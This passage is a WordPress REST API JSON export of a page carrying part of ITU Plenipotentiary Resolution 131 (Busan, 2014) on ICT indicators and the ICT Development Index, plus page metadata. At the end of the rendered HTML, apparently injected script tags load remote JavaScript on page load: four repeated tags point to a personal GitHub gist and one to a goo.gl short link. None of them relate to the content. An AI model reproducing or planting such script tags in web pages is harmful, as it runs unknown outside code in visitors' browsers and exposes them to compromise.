Post-2015 Development Agenda;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to ensure that projects, while having highly different goals and scopes, take account of the data, indicators and indices for measuring ICTs for their comparative analysis and for measurement of their results, such as for example in the implementation of Resolution 17 (Rev. Dubai, 2014) of WTDC,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Director of the Telecommunication Development Bureau<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to continue to promote the adoption of the ICT statistics developed by ITU based primarily on official data provided by Member States, and to publish them regularly;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to promote the activities required to define and adopt new indicators, including e\u2011application indicators, for the purpose of measuring the real impact of ICTs on countries&#8217; development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3        to promote efforts to disseminate the internationally agreed ICT methodologies and indicators;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">4        in order to give full effect to Resolution 8 (Rev. Dubai, 2014), to maintain a group of experts on ICT indicators and statistics so that Member States develop existing indicators and systematically review their methodologies and definitions, commencing this review in accordance with Resolution 8 (Rev. Dubai, 2014), and, as appropriate, to formulate any other ICT indicators that may be required;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">5        to continue to hold the World Telecommunications\/ICT Indicators Symposium and experts meetings, periodically, with participation by all Member States, Sector Members, experts on ICT indicators and statistics, and others interested in measuring ICTs and the information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">6        to give the necessary support for the implementation of Resolution 8 (Rev. Dubai, 2014) and to stress the importance of implementing the WSIS outcomes in relation to the indicators mentioned, and to continue to avoid duplication in statistical work in this field;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">7        to continue to work to promote an ICT Development Index using available internationally recognized methodologies as the means by which ITU responds to considering a) above;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">8        to cooperate with relevant international bodies, in particular those involved in the Partnership on Measuring ICT for Development, for the implementation of this resolution;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">9        to work on the development of indicators of community connectivity and ICT access and use and forward the results on an annual basis;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">10        to adapt the data collection and the ICT Development Index in order to reflect the changing access to and use of ICTs, and to invite Member States to participate in such processes,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">instructs the Secretary-General<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">to submit a report to the next plenipotentiary conference on progress in the implementation of this resolution,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">invites Member States<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">1        to participate in the submission to ITU-D of their national statistics on ICT access and use and community connectivity;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">2        to participate actively in these endeavours, by providing the requested information to ITU-D so as to produce telecommunication\/ICT benchmarks, in particular the ICT Development Index.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>PP RESOLUTION 131 (Rev. Busan, 2014) Measuring information and communication technologies to build an integrating and inclusive information society The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014), aware a) that technological innovation, digitization and telecommunications\/information and communication technologies (ICTs) have the potential to achieve sustainability, while contributing to enhancing socio-economic development and [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1668,"menu_order":131,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1680","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1680","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1680"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1680\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1668"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1680"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}